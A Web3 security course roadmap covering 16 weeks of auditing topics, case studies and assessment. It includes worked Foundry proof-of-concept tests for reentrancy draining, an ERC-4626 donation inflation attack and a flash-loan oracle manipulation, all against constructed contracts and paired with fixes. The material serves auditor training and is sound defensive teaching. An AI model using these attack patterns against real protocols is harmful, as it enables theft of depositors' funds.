Web3 Security Mastery — 16-Week Roadmap

  • Instructor stance: Principal Web3 Security Engineer & Auditor
  • Target learner: Developer with 1+ year of general programming experience → professional Web3 auditor
  • Method: Primary sources (Ethereum/Solidity docs, EIPs) + audit firm research (Trail of Bits, ConsenSys Diligence, OpenZeppelin, Spearbit, ChainSecurity, Sigma Prime) + real post-mortems (Rekt, Immunefi, Code4rena, Sherlock) + hands-on Foundry labs that reproduce the exploit
  • Output goal: After 16 weeks you can pick up an unknown protocol, scope it, threat-model it, find real bugs in it, write a professional report, and verify remediation.


Philosophy

"Auditors don't read code looking for bugs. They build a mental model of what the
 system is supposed to do, then look for the cases the developer didn't model.
 The exploit is always where the developer's mental model and the EVM's actual
 behavior diverge."

This course rejects three common bad habits:

  1. “Tool-driven auditing” — running Slither and reporting whatever it says. Tools find low-hanging fruit; auditors find high-impact bugs that tools cannot reason about (economic, accounting, cross-protocol, design-level).
  2. “Vulnerability checklist auditing” — scanning a known list of patterns. New protocols invent new bug classes faster than checklists are updated. A list is a floor, not a method.
  3. “Read post-mortem, feel smart” — exploits are obvious in hindsight. Real skill is spotting them before anyone has written the exploit, which is why every case study in this course is reproduced as a PoC you write yourself.

What we train instead:

  1. System-level reasoning — read a protocol top-down, map trust boundaries, identify invariants, then look for state transitions that break them.
  2. Tool fluency — Foundry, Slither, Echidna, Medusa, Halmos, Certora, Tenderly — each has a use case and a limit. Know both.
  3. Economic + adversarial thinking — model the attacker’s capital, time, and access. A bug that needs $1B of flash-loan liquidity is still exploitable if that liquidity exists on mainnet.
  4. Professional output — scoping doc, threat model, finding write-ups, severity rationale, remediation review. Auditing is a service, not a hobby.

16-Week Overview

```mermaid
gantt
    title Web3 Security Mastery — 16 Weeks
    dateFormat  YYYY-MM-DD
    axisFormat  %b %d

    section Phase 1: Foundations
    Week 01 - Blockchain & Crypto Fundamentals  :d1, 2026-05-25, 7d
    Week 02 - Ethereum & EVM Deep Dive          :d2, after d1, 7d
    Week 03 - Solidity & Foundry Workflow       :d3, after d2, 7d

    section Phase 2: SC Security Core
    Week 04 - Security Foundations CEI/AC       :d4, after d3, 7d
    Week 05 - Vulnerability Classes Part 1      :d5, after d4, 7d
    Week 06 - Vulnerability Classes Part 2      :d6, after d5, 7d
    Week 07 - Token Standards Integration       :d7, after d6, 7d

    section Phase 3: Protocol & Economic
    Week 08 - DeFi Security                     :d8, after d7, 7d
    Week 09 - Oracle, MEV, Economic Attack      :d9, after d8, 7d
    Week 10 - Bridges & Cross-Chain             :d10, after d9, 7d
    Week 11 - L2, Rollups, Modular              :d11, after d10, 7d

    section Phase 4: Adjacent Surfaces
    Week 12 - Wallets & Account Abstraction     :d12, after d11, 7d
    Week 13 - Frontend, dApp, Infrastructure    :d13, after d12, 7d
    Week 14 - Governance & DAO                  :d14, after d13, 7d

    section Phase 5: Professional Practice
    Week 15 - Audit Methodology & Tooling       :d15, after d14, 7d
    Week 16 - Report Writing & Capstone         :d16, after d15, 7d
```

Phase 1: Foundations (Weeks 1–3)

You cannot audit what you cannot read at the byte and opcode level. These three weeks build the substrate.

| Week | Topic | Goal | Lesson |
|------|-------|------|--------|
| 01 | Blockchain & Crypto Fundamentals | Distributed-ledger model, consensus (PoW/PoS), probabilistic vs deterministic finality, hash/signature/Merkle, ZK at conceptual level. Articulate which trust assumption underlies every Web3 component. | Tuan-01-Web3-Blockchain-Crypto-Fundamentals |
| 02 | Ethereum & EVM Deep Dive | Account model, transaction lifecycle (mempool → block → receipt), gas mechanics post-EIP-1559 & EIP-4844, EVM opcodes you’ll see in audits (CALL/STATICCALL/DELEGATECALL/CREATE2/SELFDESTRUCT), storage layout (slot math), calldata vs memory, ABI encoding, EIP roadmap awareness | Tuan-02-Ethereum-EVM-Deep-Dive |
| 03 | Solidity & Foundry Workflow | Solidity idioms (modifiers, custom errors, immutables, transient storage post-Cancun), inheritance, libraries, Foundry (forge test, forge coverage, cast, anvil, mainnet fork), CI for contracts | Tuan-03-Solidity-Foundry-Workflow |

Phase 1 exit skills

  • Read a transaction trace and explain every CALL/SSTORE/LOG.
  • Compute the storage slot of any state variable (mapping included) by hand.
  • Write a Foundry test that forks mainnet, impersonates a whale, and asserts an invariant.
  • Explain why tx.origin is unsafe and what AA (ERC-4337) changes about that assumption.
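A worked version of the slot-math exit skill, added here as an example; it is not part of the course labs. `Ledger` is a hypothetical contract with a plain value, a mapping, a nested mapping and a dynamic array. The test derives each slot by hand with the formulas from the Solidity storage-layout rules (value at declared slot p; mapping value at keccak256(key ‖ p); nested mapping at keccak256(innerKey ‖ outerSlot); dynamic-array data at keccak256(p) + index) and checks every derivation against `vm.load`. The last test uses the same math with `vm.store`, which is the offline counterpart of impersonating a whale on a mainnet fork. Assumes forge-std is installed in the Foundry project.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Hypothetical contract (example only): the layout an auditor maps by hand.
contract Ledger {
    uint256 public totalSupply;                                       // slot 0
    mapping(address => uint256) public balanceOf;                     // slot 1: values at keccak256(key . 1)
    mapping(address => mapping(address => uint256)) public allowance; // slot 2: nested hashing
    uint256[] public history;                                         // slot 3: length; data at keccak256(3) + i

    function setBalance(address a, uint256 v) external { balanceOf[a] = v; }
    function setAllowance(address o, address s, uint256 v) external { allowance[o][s] = v; }
    function push(uint256 v) external { history.push(v); }
}

contract StorageSlotTest is Test {
    Ledger ledger;
    address alice = address(0xA11CE); // constructed addresses
    address bob = address(0xB0B);

    function setUp() public { ledger = new Ledger(); }

    // mapping(K => V) declared at slot p: value of key k lives at keccak256(abi.encode(k, p)).
    // Address keys are left-padded to 32 bytes, exactly what abi.encode does.
    function mappingSlot(bytes32 key, uint256 p) internal pure returns (bytes32) {
        return keccak256(abi.encode(key, p));
    }

    function testValueTypeSlot() public {
        vm.store(address(ledger), bytes32(uint256(0)), bytes32(uint256(42)));
        assertEq(ledger.totalSupply(), 42);
    }

    function testMappingSlot() public {
        ledger.setBalance(alice, 1234);
        bytes32 slot = mappingSlot(bytes32(uint256(uint160(alice))), 1);
        assertEq(uint256(vm.load(address(ledger), slot)), 1234);
    }

    function testNestedMappingSlot() public {
        ledger.setAllowance(alice, bob, 77);
        // Outer key hashed with the declared slot, inner key hashed with the outer result.
        bytes32 outer = mappingSlot(bytes32(uint256(uint160(alice))), 2);
        bytes32 inner = keccak256(abi.encode(bob, outer));
        assertEq(uint256(vm.load(address(ledger), inner)), 77);
    }

    function testDynamicArraySlot() public {
        ledger.push(5);
        ledger.push(9);
        assertEq(uint256(vm.load(address(ledger), bytes32(uint256(3)))), 2); // length in slot 3
        uint256 base = uint256(keccak256(abi.encode(uint256(3))));
        assertEq(uint256(vm.load(address(ledger), bytes32(base))), 5);
        assertEq(uint256(vm.load(address(ledger), bytes32(base + 1))), 9);
    }

    // Same derivation, used to forge state: on a fork this is how you hand a test
    // address a whale-sized balance without finding a real whale to impersonate.
    function testForgeBalanceWithStore() public {
        bytes32 slot = mappingSlot(bytes32(uint256(uint160(bob))), 1);
        vm.store(address(ledger), slot, bytes32(uint256(1e18)));
        assertEq(ledger.balanceOf(bob), 1e18);
    }
}
```

Two caveats the example does not cover, both Week 4 material: variables smaller than 32 bytes pack into a shared slot (so the "declared slot" is not one variable per slot), and inherited contracts lay out parent state first, which is where proxy storage collisions come from.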

Phase 2: Smart Contract Security Core (Weeks 4–7)

Every auditor builds a ‘mental vocabulary’ of vulnerability classes. The faster the pattern fires, the more bugs you find.

| Week | Topic | Goal | Lesson |
|------|-------|------|--------|
| 04 | Security Foundations — CEI & AC | Checks-Effects-Interactions, access-control patterns (Ownable, AccessControl, role granularity), pull-over-push payment, input validation, custom-error gas/UX, storage-layout hazards in inheritance | Tuan-04-Security-Foundations-CEI-AC |
| 05 | Vulnerability Classes Part 1 | Reentrancy (single / cross-function / cross-contract / read-only), unsafe external call (success not checked, return-data forge), delegatecall hazards, storage collision, uninitialized proxies, signature replay (cross-chain + cross-contract) | Tuan-05-Vulnerability-Classes-Part-1 |
| 06 | Vulnerability Classes Part 2 | Oracle manipulation (spot vs TWAP), MEV/front-running, insecure randomness (blockhash, Chainlink VRF correct usage), flash-loan attack flow, integer/rounding bugs (precision loss, off-by-one in conversion), DoS patterns, gas griefing | Tuan-06-Vulnerability-Classes-Part-2 |
| 07 | Token Standards & Integration Risk | ERC-20 (approve race, transfer return-value differences), ERC-721/1155 callbacks, ERC-4626 inflation/donation attack, ERC-777 hook reentrancy, EIP-2612 permit & Permit2, weird tokens (fee-on-transfer, rebasing, deflationary, blacklist, multi-address) | Tuan-07-Token-Standards-Integration-Risk |
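The Week 4 CEI rule and the single-function reentrancy variant from Week 5, as one added Foundry example (not a course lab). `VulnerableVault` sends ETH before zeroing the caller's balance; `SafeVault` is the same contract with the effect moved before the interaction. `Attacker` re-enters from its `receive()` for as long as the vault still owes it and still holds enough ETH, so the drain stops cleanly instead of reverting. The 10 ether the test hands the vault stands in for other depositors' funds and is constructed; forge-std is assumed installed.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Example-only vault: interaction (external call) happens before the effect (balance update).
contract VulnerableVault {
    mapping(address => uint256) public balances;
    function deposit() external payable { balances[msg.sender] += msg.value; }
    function withdraw() external {
        uint256 amount = balances[msg.sender];            // check
        require(amount > 0, "nothing");
        (bool ok, ) = msg.sender.call{value: amount}(""); // interaction first: re-entrant call sees the old balance
        require(ok, "send failed");
        balances[msg.sender] = 0;                         // effect last
    }
}

// Same logic, Checks-Effects-Interactions order.
contract SafeVault {
    mapping(address => uint256) public balances;
    function deposit() external payable { balances[msg.sender] += msg.value; }
    function withdraw() external {
        uint256 amount = balances[msg.sender];            // check
        require(amount > 0, "nothing");
        balances[msg.sender] = 0;                         // effect before any external call
        (bool ok, ) = msg.sender.call{value: amount}(""); // interaction
        require(ok, "send failed");
    }
}

interface IVault {
    function deposit() external payable;
    function withdraw() external;
    function balances(address) external view returns (uint256);
}

contract Attacker {
    IVault immutable target;
    constructor(IVault t) { target = t; }

    function attack() external payable {
        target.deposit{value: msg.value}();
        target.withdraw();
    }

    // Re-enter while the vault still credits us and can still pay; stop before the
    // call would fail so the whole chain unwinds successfully.
    receive() external payable {
        uint256 owed = target.balances(address(this));
        if (owed > 0 && address(target).balance >= owed) {
            target.withdraw();
        }
    }
}

contract ReentrancyTest is Test {
    function _run(IVault vault) internal returns (uint256 attackerEnds) {
        vm.deal(address(vault), 10 ether); // constructed: ETH belonging to other depositors
        Attacker atk = new Attacker(vault);
        vm.deal(address(this), 1 ether);
        atk.attack{value: 1 ether}();
        return address(atk).balance;
    }

    function testVulnerableVaultIsDrained() public {
        uint256 got = _run(IVault(address(new VulnerableVault())));
        assertEq(got, 11 ether); // own 1 ether back plus the other 10
    }

    function testSafeVaultReturnsOnlyTheDeposit() public {
        uint256 got = _run(IVault(address(new SafeVault())));
        assertEq(got, 1 ether);  // balance already zero on re-entry, so receive() does not recurse
    }
}
```

Run with `forge test -vvvv` and read the nested CALL frames in the trace: the vulnerable run shows eleven `withdraw` frames stacked before the first `SSTORE` of zero, which is the picture to carry into the cross-function and cross-contract variants, where the re-entered function is a different one and CEI inside a single function no longer suffices.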

Phase 2 exit skills

  • Given a contract, identify all external-call boundaries and apply CEI mentally.
  • Write reentrancy PoCs for all four reentrancy variants in Foundry.
  • Calculate storage slot collisions in an upgradeable proxy.
  • Build an ERC-4626 vault inflation-attack PoC and explain the donation invariant.
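The ERC-4626 inflation (donation) attack from the last exit skill, as an added example that is not course material. `NaiveVault` is a deliberately reduced share vault (deposit/redeem only, no virtual offset, no dead shares) priced off its raw token balance, and `MockToken` is a minimal ERC-20 stand-in; both are constructed for the test and neither is a real ERC-4626 implementation. The invariant the attack breaks is that a deposit should never mint zero shares for a non-zero amount; the attacker makes the share price so high that rounding sends the victim's entire deposit to the single existing share.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Minimal mintable token used as the vault asset (constructed for the example).
contract MockToken {
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;
    function mint(address to, uint256 amt) external { balanceOf[to] += amt; }
    function approve(address s, uint256 amt) external returns (bool) { allowance[msg.sender][s] = amt; return true; }
    function transfer(address to, uint256 amt) external returns (bool) { return _move(msg.sender, to, amt); }
    function transferFrom(address from, address to, uint256 amt) external returns (bool) {
        allowance[from][msg.sender] -= amt;
        return _move(from, to, amt);
    }
    function _move(address from, address to, uint256 amt) internal returns (bool) {
        balanceOf[from] -= amt;
        balanceOf[to] += amt;
        return true;
    }
}

// Reduced share vault: share price = balanceOf(vault) / totalSupply, with no protection.
contract NaiveVault {
    MockToken public immutable asset;
    uint256 public totalSupply;
    mapping(address => uint256) public shares;
    constructor(MockToken a) { asset = a; }

    // Donations (plain transfers to the vault) raise this without minting shares.
    function totalAssets() public view returns (uint256) { return asset.balanceOf(address(this)); }

    function deposit(uint256 assets) external returns (uint256 s) {
        // First depositor gets 1:1; everyone after gets assets * supply / totalAssets, rounded down.
        s = totalSupply == 0 ? assets : assets * totalSupply / totalAssets();
        asset.transferFrom(msg.sender, address(this), assets);
        totalSupply += s;
        shares[msg.sender] += s;
    }

    function redeem(uint256 s) external returns (uint256 assets) {
        assets = s * totalAssets() / totalSupply;
        totalSupply -= s;
        shares[msg.sender] -= s;
        asset.transfer(msg.sender, assets);
    }
}

contract InflationAttackTest is Test {
    MockToken token;
    NaiveVault vault;
    address attacker = address(0xBAD);  // constructed addresses
    address victim = address(0xCAFE);

    function setUp() public {
        token = new MockToken();
        vault = new NaiveVault(token);
        token.mint(attacker, 10_001e18);
        token.mint(victim, 10_000e18);
        vm.prank(attacker); token.approve(address(vault), type(uint256).max);
        vm.prank(victim);   token.approve(address(vault), type(uint256).max);
    }

    function testFirstDepositorInflatesSharePrice() public {
        // 1. Attacker mints 1 wei of shares with 1 wei of assets.
        vm.prank(attacker); vault.deposit(1);
        // 2. Attacker donates 10,000 tokens directly: that single share is now worth 10,000e18 + 1 assets.
        vm.prank(attacker); token.transfer(address(vault), 10_000e18);
        // 3. Victim deposits 10,000 tokens: 10_000e18 * 1 / (10_000e18 + 1) rounds down to 0 shares.
        vm.prank(victim); uint256 victimShares = vault.deposit(10_000e18);
        assertEq(victimShares, 0);
        // 4. Attacker redeems the only share and takes the victim's deposit with it.
        vm.prank(attacker); uint256 got = vault.redeem(1);
        assertEq(got, 20_000e18 + 1);
        assertEq(token.balanceOf(victim), 0);
        assertEq(token.balanceOf(attacker), 20_001e18);
    }
}
```

When you write the finding, the remediation is one of: a virtual share/asset offset so the share price cannot be moved far by a donation (the approach OpenZeppelin's ERC4626 takes), minting dead shares on the first deposit, or having the vault track deposits internally instead of reading `balanceOf(address(this))`. The check to add in the PoC for the fix is that the victim's deposit mints a non-zero share count.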

Phase 3: Protocol & Economic Security (Weeks 8–11)

This is where high-paying audits live. Bugs here are rarely a single line — they emerge from interaction between modules under adversarial economic conditions.

| Week | Topic | Goal | Lesson |
|------|-------|------|--------|
| 08 | DeFi Security | Constant-product AMM math, concentrated-liquidity (Uniswap V3 math edges), lending protocol invariants (collateral factor, liquidation), liquidation incentive design, ERC-4626 vault accounting, stablecoin design (CDP / fractional / algorithmic), staking/restaking, perp funding-rate exploits | Tuan-08-DeFi-Security-AMM-Lending-Vault |
| 09 | Oracle, MEV & Economic Attack | Oracle architectures (push vs pull, on-chain vs off-chain), Chainlink Data Feed trust model, TWAP design and its manipulation cost, sandwich/back-run, MEV-Boost & PBS, private order flow (Flashbots Protect, MEV-Share), flash-loan-driven economic attack modeling | Tuan-09-Oracle-MEV-Economic-Attack |
| 10 | Bridges & Cross-Chain Security | Bridge taxonomy (lock-mint / burn-mint / liquidity / native asset), trust models (multisig / MPC / light client / ZK), message-layer protocols (LayerZero, Wormhole, CCIP, Hyperlane, Axelar) and their attestation models, finality assumption, replay protection, reorg handling | Tuan-10-Bridge-Cross-Chain-Security |
| 11 | L2, Rollups & Modular Blockchain | Optimistic rollups (OP Stack, Arbitrum Nitro), ZK rollups (zkSync Era, Scroll, Linea, Starknet, Polygon zkEVM), sequencer trust, fraud/validity proofs, data availability (calldata vs blob vs alt-DA), escape hatches, L1↔L2 messaging risk, shared sequencers (Espresso, Astria) | Tuan-11-L2-Rollup-Modular-Security |

Phase 3 exit skills

  • Audit a constant-product AMM for reserve drainage and rounding bugs.
  • Model a flash-loan + oracle-manipulation attack on a lending protocol with numbers.
  • Critique a bridge design for trust assumption, replay, and finality risk.
  • Explain how an optimistic rollup’s fraud-proof window affects an auditor’s threat model.
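The "flash-loan + oracle-manipulation attack with numbers" exit skill, carried through as an added example rather than course material. `CPPool` is a fee-less constant-product pool written on bare reserve counters so every number is visible, and `SpotPricedLender` values collateral at the pool's spot price, which is the bug being modelled; both are hypothetical. The pool starts at 1,000 ETH / 2,000,000 USD, the flash loan is 2,000,000 USD, and the lender's LTV is 75%. The test walks the three transactions of the attack and asserts the intermediate prices, the inflated borrow limit, and the bad debt the protocol is left holding. The lender only computes limits; it does not custody collateral, which keeps the arithmetic in focus. Assumes forge-std is installed.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Example-only constant-product pool on raw reserve counters, no fee, so k is exactly preserved.
contract CPPool {
    uint256 public ethReserve;
    uint256 public usdReserve;
    constructor(uint256 e, uint256 u) { ethReserve = e; usdReserve = u; }

    // USD per ETH scaled by 1e18. This is what a naive on-chain oracle reads.
    function spotPrice() external view returns (uint256) { return usdReserve * 1e18 / ethReserve; }

    function buyEth(uint256 usdIn) external returns (uint256 ethOut) {
        uint256 k = ethReserve * usdReserve;
        ethOut = ethReserve - k / (usdReserve + usdIn);
        usdReserve += usdIn;
        ethReserve -= ethOut;
    }

    function sellEth(uint256 ethIn) external returns (uint256 usdOut) {
        uint256 k = ethReserve * usdReserve;
        usdOut = usdReserve - k / (ethReserve + ethIn);
        ethReserve += ethIn;
        usdReserve -= usdOut;
    }
}

// Example-only lender that prices collateral at spot: the vulnerability under study.
contract SpotPricedLender {
    CPPool public immutable pool;
    uint256 public constant LTV_BPS = 7_500;
    constructor(CPPool p) { pool = p; }
    function maxBorrow(uint256 ethCollateral) public view returns (uint256) {
        return ethCollateral * pool.spotPrice() / 1e18 * LTV_BPS / 10_000;
    }
}

contract OracleManipulationTest is Test {
    uint256 constant ETH = 1e18; // all amounts carry 18 decimals
    CPPool pool;
    SpotPricedLender lender;

    function setUp() public {
        pool = new CPPool(1_000 * ETH, 2_000_000 * ETH); // 2,000 USD per ETH at rest
        lender = new SpotPricedLender(pool);
    }

    function testFlashLoanPumpsSpotAndOverborrows() public {
        uint256 fairPrice = pool.spotPrice();
        assertEq(fairPrice, 2_000 * ETH);

        // 1. Flash-loan 2,000,000 USD and buy ETH: k = 2e9, so 1000 - 2e9/4e6 = 500 ETH comes out.
        uint256 flash = 2_000_000 * ETH;
        uint256 ethBought = pool.buyEth(flash);
        assertEq(ethBought, 500 * ETH);
        assertEq(pool.spotPrice(), 8_000 * ETH); // 4,000,000 / 500: price quadrupled

        // 2. Post the 500 ETH as collateral and borrow against the manipulated price.
        uint256 borrowed = lender.maxBorrow(ethBought);
        assertEq(borrowed, 3_000_000 * ETH); // 500 * 8,000 * 0.75

        // 3. Sell the ETH back, which restores the pool exactly (no fee), and repay the flash loan.
        uint256 usdBack = pool.sellEth(ethBought);
        assertEq(usdBack, flash);
        assertEq(pool.spotPrice(), fairPrice);

        // Outcome: 3,000,000 USD of debt is backed by 500 ETH worth 1,000,000 USD at the fair price.
        uint256 honestLimit = ethBought * fairPrice / 1e18 * 7_500 / 10_000;
        assertEq(honestLimit, 750_000 * ETH);
        uint256 badDebt = borrowed - ethBought * fairPrice / 1e18;
        assertEq(badDebt, 2_000_000 * ETH); // the attacker's profit, the protocol's loss
    }
}
```

The number to put in the finding is the manipulation cost: with no fee and atomic unwind it is zero here, which is why the severity is Critical. A real pool charges a fee on both legs and a TWAP forces the attacker to hold the skewed price across blocks against arbitrageurs, so repeating the test with a 0.3% fee and a multi-block window turns "free" into a concrete capital requirement that you compare against the protocol's TVL.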

Phase 4: Adjacent Attack Surfaces (Weeks 12–14)

The contract is only one link in the chain. The wallet, the frontend, the indexer, the governance multisig — all are in scope for a real audit.

| Week | Topic | Goal | Lesson |
|------|-------|------|--------|
| 12 | Wallet, AA & Key Management | EOA vs smart wallet, Safe multisig (modules, guards, signing flow), MPC wallets, hardware wallet limits, session keys, ERC-4337 stack (UserOp, Bundler, EntryPoint, Paymaster), EIP-7702 set-code-tx implications, signature phishing, transaction simulation | Tuan-12-Wallet-AA-Key-Management |
| 13 | Frontend, dApp & Infrastructure | Wallet connection flow (EIP-1193, WalletConnect), approval drainer patterns, frontend supply-chain (npm, CDN, DNS, IPFS pinning), RPC trust (Infura/Alchemy/QuickNode public RPC), indexer/relayer/keeper risk, monitoring (Forta, Tenderly Alerts) | Tuan-13-Frontend-dApp-Infrastructure |
| 14 | Governance & DAO Security | Token-voting design, delegation, Compound Governor, OpenZeppelin Governor, Snapshot off-chain voting, timelocks, flash-loan governance attacks, multisig governance, emergency-pause patterns, parameter risk (oracle, fee, collateral factor) | Tuan-14-Governance-DAO-Security |

Phase 4 exit skills

  • Review a Safe multisig configuration and identify weak threshold / signer hygiene issues.
  • Trace a wallet-drainer attack from phishing link → signed permit2 → drained tokens.
  • Critique a Governor + Timelock setup for flash-loan resilience and emergency response.

Phase 5: Professional Practice (Weeks 15–16)

Bugs found in private are worth zero. This phase converts your skill into deliverables clients pay for.

| Week | Topic | Goal | Lesson |
|------|-------|------|--------|
| 15 | Audit Methodology & Tooling | Scoping, threat modeling (STRIDE adapted to Web3), trust-boundary mapping, invariant identification, Slither / Echidna / Medusa / Halmos / Certora workflows, manual review checklist, severity classification (Immunefi vs C4 vs Sherlock conventions), remediation review process | Tuan-15-Audit-Methodology-Tooling |
| 16 | Report Writing & Capstone | Audit report structure (Exec summary, Scope, Methodology, System overview, Findings, Severity matrix, Appendix), finding template (Description, Impact, PoC, Recommendation, Status), capstone audit project (~40h) on a multi-module protocol | Tuan-16-Report-Writing-Capstone |

Phase 5 exit skills

  • Run a full audit workflow on an unknown codebase end-to-end.
  • Produce a polished audit report indistinguishable from a junior auditor at a top firm.
  • Defend severity assignments under push-back from the client.

Bonus Chapters (read when ready)

Deep dives and emerging-tech topics. No fixed order.

| # | Topic | Goal | Lesson |
|---|-------|------|--------|
| Bonus-1 | Non-EVM: Solana / Anchor | Account model, signer/owner checks, account confusion, Cross-Program Invocation (CPI) security, Anchor constraint patterns, Sealevel runtime | Tuan-Bonus-Non-EVM-Solana |
| Bonus-2 | Non-EVM: CosmWasm / Move | CosmWasm message passing, reply mechanics, Move resource model, Sui object ownership, Aptos verifier | Tuan-Bonus-Non-EVM-CosmWasm-Move |
| Bonus-3 | Formal Verification Deep Dive | Certora CVL spec language, Halmos symbolic execution, K framework, hyper-properties, when formal verification beats fuzzing | Tuan-Bonus-Formal-Verification-Deep |
| Bonus-4 | Fuzzing & Invariant Testing Advanced | Echidna config patterns, Medusa, Foundry invariant patterns (handler-based stateful fuzzing), shrinking, corpus management | Tuan-Bonus-Fuzzing-Invariant-Advanced |
| Bonus-5 | ZK Circuit Security | Under-constrained bugs, soundness vs completeness, circom/halo2/noir, trusted setup risk, recursive proof composition, witness manipulation | Tuan-Bonus-ZK-Circuit-Security |
| Bonus-6 | Stablecoin Economic Modeling | CDP (MakerDAO), algorithmic (failed UST), hybrid, depeg dynamics, liquidation cascades, oracle dependency, peg-defense mechanisms | Tuan-Bonus-Stablecoin-Economic-Modeling |
| Bonus-7 | Liquid Staking & Restaking | LST design (Lido stETH, Rocket Pool rETH), EigenLayer restaking, AVS slashing, operator selection, dependency-tree risk for restakers | Tuan-Bonus-Liquid-Staking-Restaking |
| Bonus-8 | Audit Competition Playbook | Code4rena / Sherlock / Cantina strategy, time allocation, finding write-up style that ranks, judging culture, leaderboard ROI math | Tuan-Bonus-Audit-Competition-Playbook |
| Bonus-9 | Bug Bounty (Immunefi) | Severity scoring rubric, PoC packaging, responsible disclosure timeline, what protocols triage vs ignore, KYC / payout mechanics | Tuan-Bonus-Bug-Bounty-Immunefi |

Case Studies (after Phase 3)

Every case study = a Foundry repo where you reproduce the exploit, then write the audit finding as if you caught it pre-exploit.

| # | Case | Class | Lesson |
|---|------|-------|--------|
| 01 | The DAO (2016) | Reentrancy (original) | Case-The-DAO-Reentrancy-2016 |
| 02 | Parity Multisig (2017) | Uninitialized contract + delegatecall | Case-Parity-Multisig-2017 |
| 03 | bZx (2020) | Oracle manipulation + flash loan | Case-bZx-Price-Manipulation-2020 |
| 04 | Harvest Finance (2020) | Curve pool manipulation | Case-Harvest-Finance-2020 |
| 05 | Cream / Iron Bank (2021) | ERC-777 reentrancy | Case-Cream-Iron-Bank-2021 |
| 06 | Poly Network (2021) | Cross-chain access control | Case-Poly-Network-2021 |
| 07 | BadgerDAO (2021) | Frontend injection (Cloudflare Worker) | Case-BadgerDAO-Frontend-2021 |
| 08 | Wormhole (2022) | Signature verification bypass | Case-Wormhole-2022 |
| 09 | Ronin (2022) | Validator key compromise | Case-Ronin-Bridge-2022 |
| 10 | Nomad (2022) | Initial-message replay | Case-Nomad-Bridge-2022 |
| 11 | Beanstalk (2022) | Flash-loan governance | Case-Beanstalk-Governance-2022 |
| 12 | Euler (2023) | Donation attack on accounting | Case-Euler-Finance-2023 |
| 13 | Curve / Vyper (2023) | Compiler-level reentrancy lock bug | Case-Curve-Vyper-Compiler-2023 |
| 14 | KyberSwap Elastic (2023) | Concentrated-liquidity math edge case | Case-KyberSwap-Elastic-2023 |
| 15 | Mixin Network (2023) | Cloud key-storage compromise | Case-Mixin-Network-2023 |
| 16 | Galxe (2023) | DNS hijack of frontend | Case-Galxe-Frontend-Hijack-2023 |
| 17 | Radiant Capital (2024) | Owner key compromise via malware | Case-Radiant-Capital-2024 |
| 18 | Penpie / Pendle (2024) | Reentrancy in reward accounting | Case-Penpie-Pendle-2024 |

Dependency Map between Weeks

```mermaid
graph LR
    W01[Wk 01<br>Crypto+Chain] --> W02[Wk 02<br>EVM]
    W02 --> W03[Wk 03<br>Solidity+Foundry]
    W03 --> W04[Wk 04<br>CEI/AC]
    W04 --> W05[Wk 05<br>Vuln 1]
    W05 --> W06[Wk 06<br>Vuln 2]
    W06 --> W07[Wk 07<br>Tokens]

    W07 --> W08[Wk 08<br>DeFi]
    W08 --> W09[Wk 09<br>Oracle/MEV]
    W08 --> W10[Wk 10<br>Bridges]
    W08 --> W11[Wk 11<br>L2]

    W05 --> W12[Wk 12<br>Wallet/AA]
    W12 --> W13[Wk 13<br>Frontend/Infra]
    W08 --> W14[Wk 14<br>Governance]

    W09 --> W15[Wk 15<br>Methodology]
    W10 --> W15
    W11 --> W15
    W13 --> W15
    W14 --> W15
    W15 --> W16[Wk 16<br>Report+Capstone]

    style W05 fill:#f9a825,stroke:#333,stroke-width:2px
    style W06 fill:#f9a825,stroke:#333,stroke-width:2px
    style W08 fill:#f9a825,stroke:#333,stroke-width:2px
    style W15 fill:#66bb6a,stroke:#333
    style W16 fill:#66bb6a,stroke:#333
```

Critical path: Weeks 05, 06, 08 (yellow) — the vulnerability backbone. Without these, the rest is theory. Weeks 15–16 (green) are deliverable training; everything before is input.


Alternative Study Plans

8-Week Intensive (40h/week, full-time)

Compress Phase 1 to 1 week (skip if you have EVM experience), pair Phase 2 weeks (2 per actual week), spend 2 weeks on Phase 3, 1 on Phase 4, 1 on Phase 5 + capstone. Recommended only for learners who already write Solidity.

12-Week Standard (25h/week)

The default plan above compressed by merging Wk 02+03 and Wk 13+14.

24-Week Part-Time (10h/week)

The 16-week plan extended: one lesson per 1.5 weeks, with the second half of the slow week dedicated to additional labs and one case-study reproduction.


Weekly Workflow

  1. Read the lesson (Tuan-XX.md) plus the linked primary sources. No skipping reading.
  2. Set up the lab — Foundry repo, fork-mainnet config, mocked dependencies, etc.
  3. Reproduce the vulnerability — write the PoC test that demonstrates the bug. forge test -vvvv until trace is intuitive.
  4. Write a finding — pretend you caught the bug pre-exploit; write the audit finding into your finding journal.
  5. Review against checklist — apply the master checklist; what would you have missed?
  6. Optional: post the finding write-up to a personal blog or audit portfolio. Auditing is a portfolio profession.

Assessment System

| Component | Weight | Form |
|-----------|--------|------|
| Weekly quizzes (16 × 10 Qs) | 15% | Multiple choice + short answer, ≥80% to pass each |
| Lab PoCs (~2 per week, ~32 total) | 35% | Foundry test that demonstrates the vulnerability and passes forge test |
| Case-study reproductions (5 required) | 15% | Full reproduction of a historical exploit with finding write-up |
| Mid-course audit (after Week 8) | 10% | 20-hour mini-audit of a provided protocol; report graded against rubric |
| Capstone audit | 25% | 40-hour audit of a multi-module protocol (DeFi + governance + oracle); full report deliverable |

Capstone rubric:

  • Coverage: every external function reviewed, every storage variable mapped (30%)
  • Findings: at least 3 valid Med+ findings (judged blind by reviewer with answer key) (30%)
  • Report quality: writing, formatting, severity rationale, PoCs (25%)
  • Threat model + invariant list quality (15%)

Commitment

The point of this course is not to make you a “Solidity expert” — that’s a developer goal, not an auditor goal. The point is to make you the engineer the protocol team trusts to sign off on a deploy.

When a $200M TVL launch is six weeks out, when the team’s lead dev is too close to the code to see the cliff, when the timelock is being set up for the first time — that’s when this skill cashes in.

16 weeks. One brick at a time. Built on EVM traces and PoCs, not vibes.


Last updated: 2026-05-16 See also: MOC-Web3-Security-Mastery · References